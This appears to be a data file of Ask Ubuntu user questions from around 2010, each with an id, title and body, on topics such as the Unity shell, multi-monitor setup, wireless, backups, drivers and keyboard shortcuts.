9900	will there be a difference between unity `` desktop '' and unity `` netbook '' interface ?	what has me slightly confused from all the different reports about unity becoming the default shell in the 11.04 desktop edition : some claim and this is how most people seem to see it , that what currently is the une interface will be taken 1:1 ( including any changes made during the natty cycle ) and used as the interface for the desktop version - meaning that the interface will be exactly the same for 11.04 une and ude . some other reports talk more along the lines a `` desktop unity '' , making it sound , that while both will be using unity , the desktop edition will get it 's own unity , tailored specifically towards the desktop formfactor . so both editions will be using unity , but with slight differences in the layout or interface . so my question is , will there be any difference between 11.04 unity `` desktop '' and unity `` netbook '' interface ?
9905	how to prevent empathy from asking keyring password on every start ?	how to prevent empathy from asking keyring password on every start ? i think rhytmbox also asks for my keyring password .
9912	how can i watch blu-ray discs ?	i 've got a blu-ray drive and i 'd like to be able to use it to watch movies under ubuntu .
9914	will unity improve in 10.10 , or do we have to wait till 11.04 ?	i am currently running unity on my dell mini 9 netbook . i like the interface , but it seems a bit less `` baked '' than the previous nbr shell . for instance , performance is not great , it tends to be buggy , and it is overly difficult to manage the toolbar . with the realization that unity will become the defacto interface for 11.04 , and much of the plumbing being reworked ( i.e . porting to compiz ) - how much better will unity be in 10.10 ? is there any hope of getting improvements in any of the areas above , or will i just have to wait until 11.04 to see any tangible improvements ?
9920	x11 forwarding over gnu screen , is it possible ?	i use gnu screen constantly . but , i 've been trying to figure out if there is someway to get x11 apps to forward over screen when i am ssh-ing ( is that a word ? ) . currently if i try to run 'gedit ' through screen , it opens on my 'server ' computer and not on my client . if i do the same outside of screen , then everything is fine . but i want everything to be fine when i use screen too ! thanks ! ps : i have googled the problem and i see mention of xmove , but i ca n't seem to find the package that contains xmove on my ubuntu . ( ubuntu 10.10 )
9921	dual monitor applications opening on wrong monitor	i am new to ubuntu , been using it for about a month now . i created this desktop for myth tv , and so i use a dual monitor configuration ( one monitor for watching shows , and one for everything else ) . but because i dont have the tuner ( yet ) i am just using hulu desktop and some video files that i already have . the problem is that when i open some applications , such as firefox , they open on the monitor that is playing the video . sometimes they even open up behind the video application . is there a way to stick applications to a certain monitor , so that it will always open up on that application ? i was going to post an image of the display configure screen , but i am to new to post images . if you need to see an image of it let me know and i will email it to you . the image just showed my two screens , a 20 '' on the right , and one known as unknown on the left . the `` same image in all monitors '' button is not checked . the samsung is the monitor i want it to open on , and the unknown is the tv that i watch the videos on . firefox in particular always opens up on the tv whenever it was closed while maximized , and opens on the screen it was closed on when it was closed while not maximized . this is the biggest annoyance that i have with ubuntu . i am coming to ubuntu from mac , and have basic to mid-level terminal experience .
9922	how do i disable the home encryption offered during install ?	during install i ticked the box to enable encryption for my home directory . i 'm concerned that it is effecting performance and i 'd like to disable this option .
9923	usb flash drive not recognized	i 'm trying to mount and view the contents of a usb drive on my ubuntu 10.10 desktop , but it does n't mount . i have usbmount installed . when i view /var/log/kern.log i get the following : oct 27 23:37:37 user kernel : [ 205.220019 ] usb 4-2 : reset full speed usb device using uhci_hcd and address 3 oct 27 23:37:52 user kernel : [ 220.332019 ] usb 4-2 : device descriptor read/64 , error -110 i do n't know how to make it work .
9927	kinetic scroll in maverick	i have sony vaio fw 230j laptop . i was using lucid and upgraded my system to maverick beta in september 2010 . although there were few issues with beta release on my system although i did not felt myself in any deadlock . the most notable experience on my ubuntu was the smooth and kinetic scrolling and very sensitive touch pad experience with finer control that was oddly normal in previous releases and even on windows 7 currently . definitely this release of ubuntu is improved for touch ui experience . i believe that this is magic of 10.10 . for my official system i waited until the final release was out . after installing ( upgrading ) official system to maverick i am not feeling the same smooth and kinetic scroll experience . my laptop has graphics : intel dma-x4500mhd while my official desktop has graphics : intel dma-x4500hd do i need to install or update some software package to have similar kinetic scroll experience ?
9930	where 's the line between the dash and the file browser ?	i 've noticed some overlap between unity 's dash and nautilus , due to folders being able to be opened and browsed straight from the dash . however if you want to perform any kind of operation on the files ( except for opening them ) you have to open nautilus . i fear having two different tools for the same ( basic ) task may bring some confusion to the user . has this been considered ? what will be the desired interaction between the dash and the file browser , and what is each of them supposed to be used for in the long run ?
9932	will unity performance improve in natty or remain slow ?	there are some apps developed by canonical that are way too slow . this are usc and unity . unity in 10.10 is insanely slow ( compared to gnome which is n't actually a very fast de ) and totally unusable for a netbook ( i'ts funny because its targeted for netbooks usage ) will this get as good as gnome in natty , or remain the same ?
9933	how to read ext4 partitions in windows ?	i have two questions on ext4 : is there currently a way to mount an ext4 partition in windows ( xp/vista/7 ) to get basic read support ? if not , are there any plans to support this someday ?
9938	configuring wireless on command line interface	sometimes i boot into recovery kernel with cli and networking for troubleshooting my laptop . so is there a way to connect to a wireless router or ap over command line ? if it is possible what are the commands for the following : to list available networks . to connect to a network with : ssid , wpa2 key and dhcp mode . a command to connect with : ssid , ad-hoc mode , ip-address , netmask , gateway .
9939	what does the last two fields in fstab mean ?	the last two fields on each line in fstab ( dump , pass ) is some numbers , usually 0 . what does these numbers mean ? # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 uuid=030ccf66-5195-4835-ba3e-f5d7a5403c05 / ext4 errors=remount-ro 0 1
9941	when will compiz-based version unity be available for testing ?	i 've read in another question that canonical has already ported unity to compiz , and that this new version has much better performance on supported hardware . since the work is done , is there an expected date for natty testers to get it ?
9942	automate switch user password in script	i have to write a script and it requires root privileges to execute some linux commnads and to stop & start some services . i 'm asked to disable sudo access totally for all the users ( as the normal users can gain access to root with the command 'sudo -s ' ) and i did it . so i 'm looking for the script to automate the switch user password ( su ) which does not need user intervention . edit:1 on further research i got following script what i 'm in need of : # ! /usr/bin/python import pexpect import os passwd = `` my-root-password-here '' child = pexpect.spawn ( 'su root ' ) child.expect ( 'password : ' ) child.sendline ( passwd ) child.expect ( ' $ ' ) child.interact ( ) i have checked this script executing manually logging in as normal user and it switched to root without any problem . but when i type exit/ctrl+d to switch back to the normal user , i 'm getting following error : traceback ( most recent call last ) : file `` ./su3.py '' , line 9 , in < module > child.interact ( ) file `` /usr/lib/python2.6/dist-packages/pexpect.py '' , line 1492 , in interact self.__interact_copy ( escape_character , input_filter , output_filter ) file `` /usr/lib/python2.6/dist-packages/pexpect.py '' , line 1520 , in __interact_copy data = self.__interact_read ( self.child_fd ) file `` /usr/lib/python2.6/dist-packages/pexpect.py '' , line 1510 , in __interact_read return os.read ( fd , 1000 ) oserror : [ errno 5 ] input/output error any help ...
9945	are there mockups for the desktop-oriented unity ?	the launchpad page for the desktop-oriented version of unity lists the following features separating it from the netbook version : a floating unity dash that can be moved to all edges of the screen floating , overlapping windows with their title bars and controls on them , not on the top panel the home screen consolidated into a simple pop-down menu that extends down from the top left of the screen and allows you access to your programs and desktop search i have some trouble picturing these , are there available mockups somewhere that could help us get an idea ?
9951	rdiff-backup and running out of disk space . something weird 's going on	i 've got an rdiff-backup setup that backs up a largeish sql dump ( 1.6gb ) over a network . the server it 's backing up to ( ubuntu 10.10 server ) has a small local disk ( 4gb , 1gb free ) but has a cifs mount to a large nas ( plenty of free space ) . i 've a softlink set up from a user account 's home dir to the nas cifs mount , and the rdiff-backup job initiated from the client is writing to that directory . recently , the job has been failing . the logfile says : sun oct 24 21:20:14 2010 sending back exception [ errno 28 ] no space left on device of type type 'exceptions.ioerror' i 've run the job manually with watch df running on the server , and i can see the 1gb of free space on the local drive diminishing until it hits zero . then the job fails . to be clear , disk space is not an issue on the nas . so , for some reason , rdiff-backup is using somewhere on the local disk as a temp working directory rather than the actual directory where the backups are stored , on the nas device , as i 'd expect . however , i ca n't find which dir it 's using so i can mount that separately with its own blob of space . doing du -sx on / while the job is running reveals the total filesize of / remaining constant at 3.0gb , even though df says / is full . if i list the file handles open by the rdiff process , i get a few sockets and some files on nas mount . nothing obvious on the local disk . what 's going on ? why does df say / is full , but du -sx say there 's 1gb free ? why is rdiff-backup filling up the local disk when it should be using the cifs mount ? what 's it actually writing to ?
9954	analytics on ppa package downloads ?	is there some way to get download metrics on ppa packages ? it would be nice to know how many users are using my application from my ppa and what distributions they are using . if not , any idea of the feasibility of implementing such a feature ? for example , are ppas mirrored ? i can imagine that that would complicate things .
9955	firebug problem in 64 bit ubuntu distribution	i know that firebug does not run on 64 bit ubuntu distribution . do you know some solution for this problem or why it happens ?
9958	dsl pppoe connection not working ?	i use a wired pppoe connection to connect to the internet . what i need to do on windows to connect to it is put in static ip address , gateway , subnet mask and dns servers for my lan card . next i have to create a dialer for a pppoe connection , put in my user name , the service name and the password , and `` dial '' this connection . and it works fine . on ubuntu 10.04 , however , i have tried setting things up in a similar fashion - put in all static addresses for the `` automatic '' wired connection , then put in user name , service name , password for a `` dsl '' connection . it worked for a while , then stopped . i have tried putting in all the details within the dsl configuration dialog , same thing happened - it worked for a while , then stopped . i have tried deleting the ethernet connection and only keeping the dsl one with all the numbers put in place , same thing happened - it worked for a while , then stopped . each of the times , when it connected , it connected randomly , after trying a few times , and either stopped working within a few minutes , or after i had rebooted . i have deleted and remade the connection dozens of times - even with different names , but nothing seems to be working . i have also tried pppoeconf from the terminal , did n't work . i have checked /var/log/kern.log , but nothing changes in the file when i try to connect . i have also checked /sbin/route , but gedit ca n't even open it ( says it ca n't figure the character encoding ... ) . the `` connection established '' notification pops up from the top right corner , the same way as when the computer is actually connected to a network . can anyone figure what 's wrong and how it can be solved ?
9962	will there be possibility in unity to change default file manager ?	one nasty limitation of upstream gnome is that nautilus usage is hardcoded in , for example , in gnome panel . that causes nautilus elementary to replace nautilus package and nautilus executable instead of creating separate project . this also prevents users from using alternative file managers such as pcmanfm . maybe canonical should develop some measure to allow user to choose his file manager in unity ?
9965	simplest way to use graphic acceleration to watch videos	i 've heard about the possibility to play videos using graphic processor of video card instead of normal processor . i 've read a few tutorial but i have n't see improvement in performances , processors continue to work a lot , so maybe i just have n't enabled this feature . i 'm wondering if there 's a simple and quick method to do it and which are practical advantages , no technical or theoretic . i have an nvidia 8400 and i use proprietary driver ( 260.19.06 ) .
9966	with `quiet` kernel option in my grub entry , can i make the boot messages visible ?	i like my machine to boot quietly , if only for aestethic reasons . sometimes , however , things go wrong , and then i would like to see the boot messages . can i switch them on during boot , i. e. without rebooting and modifying the grub entry ?
9967	is it possible to replace the unity launcher ?	is it possible to replace the unity launcher ( dock ) in ubuntu 11.04 with another dock ( for example docky ) ?
9968	will ubuntu 11.10 feature gnome shell ?	will 11.10 feature gnome 3 / gnome shell or will it feature unity forever ?
9972	will the unity side-bar eventually have configuration options ?	i ask because of the common , `` websites are 1024px wide '' issue : will it be possible to change the behaviour of the side-bar , e.g . to auto-hide , move or resize it ?
9975	highlighting and copying chunks instead of lines ?	i remember vaguely , that we could highlight chunks in vi . is there anyway to do that in a console ? eg : in the image , i wanted to select the numbers only , but highlighting only captures complete lines , not discontinuous chunks . i hope i am clear what i mean . let me know if its possible and theres a way . thanks .
9976	under which licence is unity available ? is it protected by any copyright or patents ?	i mean under which license is the source code available ? i 'm not sure if unity is free software
9978	what should i look for , or avoid , in a laptop that will run ubuntu ?	instead of asking the question , `` what laptop make/model is good to use with ubuntu ? `` , i was wondering if focusing on the characteristics of a laptop would be helpful . things i am wondering about are along the lines of : ati vs nvidea vs `` it does n't matter '' wireless specs to look for or avoid display specs to look for or avoid audio specs to look for or avoid etc . thoughts ? thanks !
9989	unity interface freezes	i select the unity interface when i log in , and it only shows me the desktop wall-paper . the mouse works , and alt+f4 shows me the appropriate options . but no alt+f4 or other options or windows . after a while a window appears saying that it can not find tray icon . i use ubuntu 10.04 on a dell pc .
9990	allowing guest session to access certain user directories	i want my guest accounts to be able to access ~/music . i 've changed the settings in my main account but ca n't find the share when i start a guest session . where should i look , or what am i doing wrong ? edit : now i can see the root folder by browsing to `` network '' , but ca n't access any sub-directories .
9994	what do i need to do to backup & restore ( copy ) users when migrating from one ubuntu box to another ?	scenario : new pc with fresh ubuntu installation ( 10 ) + old pc with ubuntu ( 8 ) want to copy the old users ' setting+files onto the new pc would like to keep as much program settings as possible ( thunderbird , firefox , f-spot , gimp , desktop links , ... ) what are the necessary steps for this ? will i have to create the users prior to copying the /home directory ? should i copy the whole /home directory or only the directories of specific users ?
10004	how to install driver for an acer orbicam bison ?	how to install driver acer orbicam bison in ubuntu 10.10 ?
10005	getting trayer to work with dual screen setup	i 'm using xmonad as my window manager , and want to use trayer as a icon panel for things like nm-applet . the problem was that the panel would n't appear on the top of the screen . if i set it to the bottom it just appeared . after a lot of trying , i found out it is because my xorg.conf is setup for dualscreens , and probably the trayer panel is spawned outside my view ( i currently have only a single screen , but i switch a lot ) . after manualy tweaking the xorg.conf file to allow for just one screen , the panel appears on the right spot . these are the things i had to modify : section `` monitor '' identifier `` 0-lvds '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1366x768 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' # was 1280 256 option `` rotate '' `` normal '' option `` disable '' `` false '' endsection subsection `` display '' viewport 0 0 virtual 1366 768 # was 2646 2646 depth 24 endsubsection the problem is ofcourse that i ca n't use my dual screen setup anymore . is there a way to force trayer on the right position even with the dualscreen setup ?
10008	how to make keyboard work like osx system wide ?	i switch back and forth between two computers constantly : osx snow leopard ubuntu 10.10 i 'd like to be able to make ubuntu use the same keyboard shortcuts as osx system wide , for the following keyboard sequences only ( ie i do n't want to make ctrl act like super ) super+c - > copy super+v - > paste super+t - > open a new tab in whatever browser i 'm in . super+w - > close a tab in whatever browser i 'm in . so in short , is there anyway for me to map just these keyboard sequences to the following , system wide ? super+c - > ctrl+c super+v - > ctrl+v super+t - > ctrl+t super+w - > ctrl+w i know there are ways for me to do this for vim , and firefox , and i 'm sure specifically for most applications ... but i would prefer to have to do this just once and have it work that way system wide ! i 'm using a standard pc keyboard , that is `` generic 105 key ( intl ) pc '' on ubuntu . i 'm also using the same keyboard on my mac mini .
10009	which tiling window manager is easiest to install and use inside of gnome	i just tried integrating xmonad with gnome on ubuntu 10.04 , according to the instructions found here : http : //www.haskell.org/haskellwiki/xmonad/using_xmonad_in_gnome # ubuntu_karmic unfortunately , i was not successful at getting it to work . i 'm wondering are there any tiling window managers that are easy to install and use inside of gnome as a replacement for metacity or compiz ? update i just got xmonad working inside of gnome . this was a two-step process : first , execute this line inside of gnome : gconftool-2 -s /desktop/gnome/session/required_components/windowmanager xmonad -- type string as described here : http : //haskell.org/haskellwiki/xmonad/using_xmonad_in_gnome # setting_up_gnome_to_use_xmonad second , and most critically ( this was the step i was missing ) , add the following to ~/.xmonad/xmonad.hs : import xmonad import xmonad.config.gnome main = xmonad gnomeconfig as described here : http : //xmonad.org/xmonad-docs/xmonad-contrib/xmonad-config-gnome.html
10014	dell vostro wo n't boot with a usb . when try to boot from it , it say “boot error”	here 's the problem ; i 'm trying to install ubuntu : maverick meerkat using a usb flash drive on my dell vostro but when i try to boot from it , it say `` boot error '' . i used universal-usb-installer-1.8.0.8 to create the bootable usb flash drive . any idea ? i tried the same process on other machines and it works fine .
10020	deleting files by force !	hi i have a flash memory which is damaged and became read-only . i want to delete my data . how can i do so ? is there any way to make it completely impossible to read files on my flash memory ?
10024	how do i change the gdm login window top icon ?	after installing xubuntu-desktop on ubuntu 10.10 , the gdm window icon changed to a blue mouse , how to i return gdm to the default ubuntu theme/icon . i have tried the following which effectively changes the theme but does n't modify the top icon . http : //www.n00bsonubuntu.net/content/how-to-change-login-screen-ubuntu-1010-maverick-meerkat
10026	how can i search for filenames with special characters ?	how can i search for filenames with special characters ? i 'd like to search this folder for any files or subfolders that contain special characters . i 'd also like to do this with one string if possible so that i 'm not performing a single search for every special character . via applications > accessories > search for files ...
10030	how do i access shared folders by ip address ? ( for example , in windows , i use `` \\172.16.243.7 '' )	right now , if i want to access shared folders on my network , i have to browse them via network in nautilus . i am wandering how i can open shared folders of a pc , by its ip . tldr ; equivalence of running `` \ipaddress '' in windows .
10031	what is 'ubuntu unity ' ( for the desktop ) ?	ok , so there 's the buzz of canonical ( wanting to ) switch for new ubuntu version from the gnome default desktop to their own unity shell . ( i hope that 's accurate . ) it seems i can not totally fathom what unity actually is . for looking at its homepage it currently is firmly targeted at netbooks and the somehow different usage model on these . is it a classical desktop ? -- taskbar ? shortcuts ? is the difference between ubuntu ( gnome ) +unity more/less pronounced than the difference between ubuntu and kubuntu ? will `` my parents '' be able to get the interface if they 've been using the classical gnome desktop so far ? edit : i would not like to split this up into more specific questions , as what is unity ? is exactly what the people i set up ubuntu boxes for will ask me if they hear that the newer ubuntu version is using that instead of the desktop -- and it might well happen someone phrases it like that : - ) i will certainly not give them the link to the hp as the explanation there does not lay out if it is a desktop or something more or something less : ( it does not for me - therefore i 'm asking here . ) unity is designed for netbooks and related touch-based devices . it includes [ ... ] that makes it fast and easy to access [ ... ] while removing screen elements that are rarely used in mobile and netbook computing . ( emphasis mine ) -- the explanation there does n't even mention the desktop-pc ! unity has a vertical task management panel on the left-hand side and a menu panel at the top of the screen . [ ... ] this sounds like a re-themed normal desktop . clicking on an icon will give the target application focus if it is already running or launch it if it is not already running . if you click the ... aha . sounds like windows 7 . ... icon of an application that already has focus , unity will activate an expose-style view of all the open windows associated with that application . no clue what that 's supposed to be . so it would really be nice if someone could explain for non desktop-design-terms experts what unity is .
10036	why when i log in my two screens shows the same image automatically ?	when i log in on my computer , first my two monitors shows their own part of a larger desktop , then automatically changes to the same image on both screens , but i do n't want to happen this , is there any configuration to avoid this ? about my hardware : 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 09 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 09 )
10043	how do i set up a default gnome and kde desktop for every new user i will create ?	i 'm trying to set up an image of ubuntu lucid to install on some pcs at work . for that i 'd like to add and remove some programs , settings , menus etc . i 've heard about the /etc/skel directory . if i configure both desktops and copy /my/ whole home-directory to /etc/skel , what will happen to the permissions ? also , are there any files referring to absolute paths , i.e . /home/alexxhardt/.. etc ?
10044	bad performance with ati radeon x1300 ?	i 'm having problem with ubuntu 10.04 and my ati radeon x1300 . in particular i ca n't enable effect ( compiz ) because they are slow , and , for example , the same game ( hedgewars ) on the same pc run very slowly on linux , nor in windows . with my old ubuntu ( 9.04 ) i did n't have the same problem . does anyone help me to `` configure '' the right driver for my video card ? i 've tested with proprietary ( fglrx ) and open ( xorg..-ati-radeon ) ... either give me some problem : ( ! thank you !
10045	hotplug second screen	i use here a laptop with an extended screen sometimes . first i needed to edit the configuration by nvidia-settings to apply changes of my screen configuration , but now i have improved that by using disper . that allows with one command to switch on/off the extended screen . only single screen : disper -s , switch second screen on as extended screen : disper -e either i looking for a way to do this automatically . is there something that can provide me a signal about hotplugging of screens ? something that is useful to trigger disper ?
10054	theming the grub2	can i theme the grub2 , and does anyone have any advice on doing this ? thanks in advance .
10059	ubuntu using up battery power too quickly	i use dual boot of windows 7 and ubuntu 10.10 on my laptop . my windows 7 easily runs for about 2 hours on battery . the problem is ubuntu uses up all the battery in about an hour . is there anyway to manage power more efficiently in ubuntu ?
10071	how to report xorg restarts ?	lately i 've been having problems with the x server restarting when i 'm enabling/disabling twinview or running low on available memory . how would i go about reporting such an incident after it happens ?
10075	current gnome interface in ubuntu 11.04 ?	i am wondering if it will be possible in ubuntu 11.04 , to use ordinary ( the current ) gnome interface like the one in ubuntu 10.04 , because i do n't really do n't like the unity look . thank you .
10079	will functionalities that we are used to in the old shell be available in unity ?	i am currently using nautilus actions , an application that lets one add useful commands to the context menu , will something as useful be included in the unity shell ? secondly , i have quite a number of useful scripts available in the nautilus scripts folder these scripts are available to me via the nautilus script context menu where i can pass file-names to them for processing by clicking on files and selecting the particular script , to do serious work , will this process be available in unity ? lastly , another useful thing is the templates folder , document files or scripts placed here will be available in the right click `` create document '' menu item , when the document of interest is clicked a copy is created in area that you right clicked , as simple as this is it is a very useful thing , will a templates folder that facilitates such a thing be available in the unity shell ? i will be asking the gnome shell people about these things too as this concern is applicable to that shell too , being such a dramatic change from the old gnome interface .
10082	which is the best way to install new hplip versions ?	hplip is the software that drives most hp printers . usually new printers are only supported in newer versions of the software . canonical does n't backport new versions packages to older ubuntu versions , that means that newer drivers are not going to be available in the software center of older ubuntu versions . as an example yesterday i needed to hook a hp 1005p to a computer running 8.04 . i was forced to install a newer hplip than the version available in the repositories . i installed it using the script from the hp page , but i 'd like to know other alternatives . which is the best ( technically , not the easiest ) way to install it and why ? .
10086	if unity launcher is auto-hide , how will elements on upper panel behave ?	when launcher hides to left , active windows will maximize their borders to full screen . alignment between windows left border and windows buttons + global menu on upper panel would be lost , it will look very strange . i want to know what is the real plan on auto-hiding . sorry for my poor english .
10090	how can i remove `` ubuntu netbook edition '' option from the gdm session menu ?	i was trying out unity and then i uninstalled it but there is still an ubuntu netbook edition option in the gdm session list . accidentally clicking on that causes the user to log in to a broken desktop . how can i remove it from the list ?
10092	why do indicator applets exist ?	why ubuntu uses the indicator applet ? it loses a lot of usability , why made it when gnome already have one ? example without indicator applet : application is in the icon tray left click opens the application window right click shows a menu related to application with indicator applet : application is in the icon tray left click shows a menu with a few options related to application right click shows a menu related to `` indicator applet '' this means it takes 2 clicks to show the application main window , while before it need only one . why make something that already exists and is useful ? why change for something that no has usability ?
10094	problem in switching from pl/sql developer to sql developer	i want to become ubuntu user , but sql developer is not comfortable enough for me . main problem for me is that when i query data with select statemant and the result is displayed it is not possible to edit data directly ( this feature is in pl\sql developer ) . does there exist solution for this : directly to edit queried data .
10099	what office suite will be used in 11.04 ?	which office suite will be used in ubuntu 11.04 ? open office or libreoffice ?
10104	why do some people need low-contrast themes ?	everyone is familiar with the high-contrast themes that are created for people with poor eye-sight . because of the high contrast it is easier to see what is on the screen . however , i heard there are also low-contrast themes . could someone give some examples , but most importantly , could someone explain why there are low-contrast themes and who are helped by it ?
10115	how can i execute commands in a text file ?	i have a bunch of commands seperated by \ns that i 'd like to execute serially ( from the command line ) in a file called ec2-env-setup . i 'd appreciate any help .
10119	private directory mounted without passphrase ?	after setting up a private directory in ~/private , i noticed that ecryptfs-mount-private is able to mount the directory without supplying a passphrase . is there a way to disable this behaviour , to force ecryptfs to ask for a passphrase ( and entirely disable automounting using a key in the keyring ) ?
10121	will ubuntu 11.04 use gnome 3 ?	will ubuntu 11.04 use gnome 3 ? if so , what differences for end-user is going to be ? i know that there wo n't be gnome shell , but what about the login screen ? will ubuntu continue using that old ( gnome 2.x ) one , or create its own , or use the new gnome 3 login screen ( maybe it will be a part of gnome shell ? http : //live.gnome.org/gnomeshell/design/whiteboards/loginscreen ) ?
10122	why does my kernel.log file report 'link training error ' and 'failed to check link status ' ?	every 3 to 5 seconds i get the following output in kernel.log file . how do you fix this ? oct 28 00:04:30 host kernel : [ 57192.331327 ] pciehp 0000:00:1c.4 : pcie04 : link training error occurs oct 28 00:04:30 host kernel : [ 57192.331331 ] pciehp 0000:00:1c.4 : pcie04 : failed to check link status
10128	no top bar on windows when maximized on ubuntu netbook with dekstop session	i have ubuntu netbook edition 10.10 installed but i found unity to be too slow . i 've tried switching to the desktop session when logging in but now when my windows are maximize , there are no windows top bar . how can i get back my top bar ? executing metacity -- replace did n't do anything by the way . a screenshot to show the problem : thanks
10133	i3 core performance problems	i just tried to play quake3 ( quakelive ) on a new laptop with an i3 core integrated gpu , running ubuntu 10.10 . strangely , the performance was terrible . i 'm running on intel driver , which seems to load correctly . i know it 's not a high-end system , but i got used to q3 being fairly playable on 3yo built-in i850gm with single core cpu , which was obviously much worse . after switching to i3 , i get barely 5fps , even if i use very low resolutions ( 640x480 and similar ) . what could affect the performance that much ? what should i look for ? there does n't seem to be anything obvious in the xorg logs , or my xsessionerrors .
10134	how get a higher resolution icon for google chrome in docky ?	i have a great icon pack and nearly every single app has a high resolution icon . but not google chrome . in docky the google chrome icon is fuzzy and bad , how can i replace it with a high resolution one ?
10136	where is the google search bar in unity ?	on many screenshots from unity i can see a google search bar in the upper panel , like in this screenshot http : //arstechnica.com/open-source/news/2010/10/shuttleworth-unity-shell-will-be-default-desktop-in-ubuntu-1104.ars is this a newer version of unity ? and if it 's newer , where can i get this version ?
10142	how do i create a link to a .exe file who has the same behavior that i get in windows ?	i have a world of warcraft installation in my wine directory , and i want to place a link to it in the desktop . but when i create a link with the right mouse button menu , and place it in my desktop , it does n't start . i 'm a newbie here , so , forgive me if this is one basic function that i did n't have the braincells to discover
10143	easiest way to navigate across tabs within terminals	usually i have several gnome-terminals running , with several tabs each . unfortunately , it is very difficult to navigate across them . alt-tab only navigates across windows , not across terminals 's tabs . is there anything that could display to me titles of all tabs that i have opened across all gnome-terminals , and let me jump to it ? thanks , ilyia
10146	ca n't play .wmv files after attempting to add dvd playback from medibuntu	i can not see video with `` movie player '' , `` gnome video '' or with `` vlc media player '' ... or in any browser .. annyone have any guesses ? ?
10148	why does n't ubuntu move to dvds ?	taking into account hardware requirements , chances are that you will have a dvd reader . i think its a bit silly to keep limiting ubuntu size to 700mb . if they switched to dvd size ( 4,7 gb ) we could include more apps , not only more but also better . they claim that they do n't include vlc because it does n't fit so instead they include totem which is a much worse player . live cd and instalation would be faster , since they would n't need compression at all , or maybe a much lower compression rate . and for those who only have a cd player , offer a ripped version ( like alternate cd ) .
10157	how can i create automated keyboard scripts ?	is it possible to do the following in ubuntu ? if so can someone point me in the right direction . say you want to set a keyboard shortcut to do the following : for examples sake , set alt+f to open firefox and maximize it , but only if firefox is not already running . if it is running and not maximized , then maximize the most recently touched firefox window . if it is maximized , then minimize firefox . thanks , joe
10161	dialog box prompting to enter the password on startup	i 'm using ubuntu 10.10 . following an update , when i restart my system ( automatic login is my preference ) , a dialog box appears with the text : '' enter your password to unlock your login keyring '' what 's wrong ? can anyone explain why this appears ?
10165	why not include something like ksplice so there is no need to reboot after updating ?	ksplice is an amazing software ( or whatever it is ) . it changes the way kernel updates work : instead of rebooting after an update , it patches memory , so you do n't need to do anything .
10167	when will ubuntu include delta updates ?	i 'm tired of downloading 300mb updates . windows has done delta updating since xp . it 's just silly to download the whole thing if just a few bits of the package change .
10168	opera-like tab-switching in chrome or firefox	is there a way of switching tabs in chrome or firefox by scrolling the mouse-wheel while keeping the right mouse-button pressed ? in chrome or firefox ( with tab-wheel-scroll extension ) you can switch tabs by scrolling the wheel while hovering the pointer over the tab-bar . the opera function is much more comfortable , since you do n't have to aim at the tab-bar in order to switch . i have already tried assigning tab-switching keyboard shortcuts to the mouse-button in combination with the mouse-wheel , but it did not work at all . it seems to me that mouse-events can not be combined in xbindkeys . furthermore , assigning anything to the right mouse-button in xbindkeys disabled the standard functions of the button completely . thanks in advance , bye ysn
10171	how do i change the size of the status bar ?	since unity is going to be the default on 11.04 , i 'm trying it out at work where i have a 30 '' display . how do i make the status bar larger ?
10173	crackling audio with pulseaudio	this is a problem that i have been experiencing for a while now ( since 9.10 ) ; before that i used a beta driver from creative ( i have a sb x-fi on my dell xps 710 ) , and even though , i have to compile and link it every kernel update , it worked just fine . starting with jaunty , ubuntu detected my sound card , but the output on the speakers was very poor , it was very noisy with crackling sounds ; i ended up switching pulse audio with alsa , and then i got a clean sound output . now that i have upgraded to maverick , the issue persists , and i want to know how to have pulse audio disabled , and have alsa or oss instead .
10175	performance of 3d applications on unity/compiz comparison with other configurations	in the past i have had three important applications having problems with compiz and the proprietary nvidia graphics driver , they are ; googleearth , the secondlife client and blender , compiz and the old shell have come a long way and the performance of these applications when compiz compositing is turned on is now largely acceptable . given that you have decided to use compiz with unity instead of mutter , will you be testing these or any other important 3d applications with unity using compiz and unity using mutter to see which gives the best performance ? tests like these could help to make your case . so far i have only heard of the better hardware compatibility of compiz and suspect that it will be a better compositing system for unity . how the above two configurations compare with the latest compiz on the old shell and a test of gnome shell using its mutter compositing running these applications would also be useful for comparison . maybe someone at phoronix could help in this regard if scientific presentation is desired but a honest personal experience being reported from such tests would be immensely useful i think . i know it is early days and i do not know the status of unity with compiz i surely hope we will not have to go back to the old days when it was a must to turn off compositing to get work done when using certain applications , especially since the unity shell will be more dependent on compositing than the old shell , in other words what if we have to turn off compositing to use say , blender , what will happen ? here is hoping that we will not have to wait another long time to get unity/compiz working well with applications that need 3d rendering .
10177	why ca n't i load this website except on windows ?	http : //www.battleswarmzone-.spruz.com/ fails to load on my system under ubuntu , but loads under windows . i ca n't ping this subdomain either , but spruz.com loads fine . worse still , even proxies do n't work , and worse even further : i ca n't load it with the firewall off either . any clues ?
10178	how can i mount an afs filesystem ?	my current method is to mount the filesystem via ssh using nautilus 's graphical interface , but i would much prefer to be able to use some tool that mounts the afs filesystem and gives me access to afs-specific features ( permissions , etc. ) . i 've tried installing openafs via apt-get , but so far the kernel module has refused to compile . also , assuming i get openafs installed , i 'm not quite sure how to actually mount the remote filesystem to , say , /media/afs or some directory . i 'm running maverick with the 2.6.36-020636-generic kernel from http : //kernel.ubuntu.com/~kernel-ppa/mainline/ thanks for the help !
10185	why do some gtk+ themes have transparency ?	certain themes like the community theme `` homosapien '' have transparency in particular apps such as gnome terminal and gnome system monitor . is this a bug ? screenshot : http : //img408.imageshack.us/img408/5165/transparentj.png
10186	execute command on gnu screen attachment	is it possible for gnu screen to detect when a session has been attached and to run a command ? ( the command will be a shell script that i wrote ) thanks .
10188	why does n't wminput work ?	i have even tried installing wminput from source , but uinput refuses to load on my system . i even loaded the kernel module manually . how can i alleviate this ?
10189	how to edit an . avi file 's metadata ?	i have been looking for a solution for this little problem since intrepid ( 2 years ago ) and still have n't found any . easytag works great editing the metadata of .mp3 's and i 'm hoping for a similar application to edit .avi files .
10195	good application for printing envelopes ?	does evolution have the ability to print envelopes for your contacts ? how about one of the openoffice applications ? i 'm going to be setting up an ubuntu pc for my parents company soon and was wondering which applications you guys would recommend for business contact managing and envelope printing .
